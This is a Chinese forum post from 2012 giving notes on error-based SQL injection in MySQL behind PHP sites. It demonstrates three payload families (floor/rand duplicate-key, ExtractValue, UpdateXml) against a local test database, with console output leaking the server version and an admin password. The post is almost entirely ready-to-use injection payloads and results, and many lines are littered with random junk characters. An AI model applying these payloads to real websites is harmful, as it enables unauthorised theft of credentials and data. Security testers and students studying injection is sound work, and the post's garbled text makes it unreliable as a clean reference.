放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。! C, ]( b% j" o4 F- E
实际测试环境:3 X; }$ }" y& p0 H
+ R" x; W* ~, U. c* R, m
# J; e: ]4 k! p- v
mysql> show tables;
7 _5 I7 k1 i4 L5 t1 g+----------------++ j: a% n) j; G) O! d1 ^' y2 O! h
| Tables_in_test |. {1 N% Z( V+ Q. ]/ b2 z' V
+----------------+
" B) L5 s! p& t0 S% q# G| admin |
3 b' P0 g9 J& |3 D| article |% s7 n4 m+ `. q! C8 p, D/ J8 H$ `% X
+----------------+# t% q' G' L: B) R, v- e) ?( g4 f9 P
8 C, b8 `1 y0 s, z
- g* v( V6 T$ L2 Y
" ]1 O) U& Z- n- V6 u$ h# qmysql> describe admin;% g3 R: Y: r4 r$ I8 M' E
+-------+------------------+------+-----+---------+----------------+; U: R n9 H5 `$ x8 G
| Field | Type | Null | Key | Default | Extra |+ K( q" a, ?+ J& W( O9 e
+-------+------------------+------+-----+---------+----------------+. c3 T$ @+ ` x8 u( t
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |0 N# ]. i& z) d8 O5 a9 }
| user | varchar(50) | NO | | NULL | |
7 U, A+ g" G5 ]9 p9 n% W+ R" [| pass | varchar(50) | NO | | NULL | |
& ^4 x! {* W4 l: M O( {+-------+------------------+------+-----+---------+----------------++ {, q, k; _7 d. _' {
: u( A: d @3 w$ I. ?
$ A6 R: G8 `' Q! d! s4 ]6 z
Y: k' E9 I9 z2 |0 p( ]mysql> describe article;
* R" ]! d/ i3 ^2 H# ~+---------+------------------+------+-----+---------+----------------+
+ B/ X( F6 \1 d| Field | Type | Null | Key | Default | Extra |7 S8 M% H6 n% r4 x% A5 i
+---------+------------------+------+-----+---------+----------------+2 y1 Z1 V& h6 B! P6 h3 [# J
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 _- H) F; c2 x; K1 I0 k| title | varchar(50) | NO | | NULL | |
+ n" R/ I2 m9 o9 }" j| content | varchar(50) | NO | | NULL | |, ~% P4 t. q/ [. \3 E8 a
+---------+------------------+------+-----+---------+----------------+; Q0 H* y/ a3 i+ v1 t
1、通过floor报错
/ `! I3 r" q5 T& v* t# F可以通过如下一些利用代码
9 C$ f9 a7 V) `2 Y# D$ ]* F6 J/ Z
5 x8 j9 z" m; R7 h; `5 U# R
. D" K5 Y8 T, Q5 G1 o7 F( band select 1 from (select count(*),concat(version(),floor(rand(0)*2))x5 ]+ |7 i' H8 n+ ] t9 a y
from information_schema.tables group by x)a);
) l8 k; j0 j3 s6 q# F8 C7 K' \ 1 W! m9 ^, _+ d) l8 Q4 ]5 {
2 V1 E! k: x+ [+ u
and (select count(*) from (select 1 union select null union select !1)x; G! T0 P; {/ d
group by concat((select table_name from information_schema.tables limit 1),
8 ~5 N1 l+ H) d1 i3 j: kfloor(rand(0)*2)));5 h/ G8 v) B: }6 g% O
举例如下:
6 G& }# t# N2 z6 N3 N$ h$ j2 Q: Z首先进行正常查询:3 }2 @1 v- x& }: {/ C
% }! o) ^/ v/ G! _4 U
mysql> select * from article where id = 1;1 ^5 r' q. G5 v6 d Y0 U6 D8 Y
+----+-------+---------+
2 b4 T- c4 @6 p0 U| id | title | content |
' f y( @6 a, O' J. g; E+----+-------+---------+5 S6 V* h7 q4 W3 u0 O, B
| 1 | test | do it |
0 l2 l( {4 W7 B) p% r" D+----+-------+---------+9 |! R- v+ r. B9 H; A$ ~& ^. C- y
假如id输入存在注入的话,可以通过如下语句进行报错。7 Y( g0 M9 O7 `9 ^1 @9 Q6 l1 V
W* ?: w' w$ B! N
, H; L) a g/ W2 N
mysql> select * from article where id = 1 and (select 1 from! U) B r) Y- u1 i4 r" ]" P8 H
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);# v, b1 N; W; ]6 d4 _
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
0 [3 b1 p& V$ F" K1 Q7 d! a可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
# h O- s& U) g. M4 E例如我们需要查询管理员用户名和密码:
" N3 ]) S& I c! @Method1:/ c! a2 s4 ?% v+ p0 n
: U( T, Z, A# [1 L, @# d" n3 b# C: _
8 Z& e; M: h6 V
mysql> select * from article where id = 1 and (select 1 from5 r( y7 P9 \. q. Z
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
% l; W3 X5 E& S8 ?. }from information_schema.tables group by x)a);
I! N( y% b* g5 c4 R) JERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
6 R; t+ Y0 a3 z+ Z) P4 ?Method2:
( a7 r( _: ~! K2 X9 T 1 a& Y8 i0 C$ h' i% @& |4 v
2 M) L$ O6 I9 H" Bmysql> select * from article where id = 1 and (select count(*)5 ~5 p0 ^; O4 ]* j" ?4 j: m; D1 p8 Y
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
T, k* I8 f+ V; {0 A6 j0 rfloor(rand(0)*2)));5 B& `$ K- j$ T9 Q2 A+ Z
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
; m5 G0 _, b, h2、ExtractValue
R& K3 `' ^6 s测试语句如下
7 I' `, j# \& v' q5 p( { % _$ h6 f# e" T& H/ R/ @7 S; s
5 {* \1 {+ v ?$ \: {and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
' T; Q* O2 b. \3 J5 n实际测试过程
9 Z' |) Q; W/ o% {: A
7 Z, a6 E" P- H% b
' m6 N# D% I9 v9 a1 A1 rmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,3 Z r0 L: t- d2 G
(select pass from admin limit 1)));--
# {- N7 l/ b6 w5 {ERROR 1105 (HY000): XPATH syntax error: '\admin888'
E% M) a" z' P3、UpdateXml6 q' a( z! P* g. S
测试语句7 A6 j1 [, o+ _# y) f/ _
+ i6 _* k' I0 u+ A" P! @' S( g M/ M0 ]
% P: c7 H3 G2 ]- qand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))2 v9 w- s5 b7 q. B
实际测试过程
7 ]) @. p1 v2 C% Q
- ^6 p4 W) x/ o/ \- K& S
% F! ?0 N7 K! B+ L, f; o8 f4 O& @mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
6 K" N. a* \7 R# _4 S, n" z(select pass from admin limit 1),0x5e24),1));
0 ]0 s0 W! y8 C$ |7 }4 fERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
3 b' C$ u+ p; cAll, thanks foreign guys.9 ]' \* O$ U7 X' S" b2 W9 r- R
. g) c0 a, ~0 U L3 ^
/ E" B M& k% x# L3 R |
发表于 2012-12-10 10:28:51
收藏
支持
反对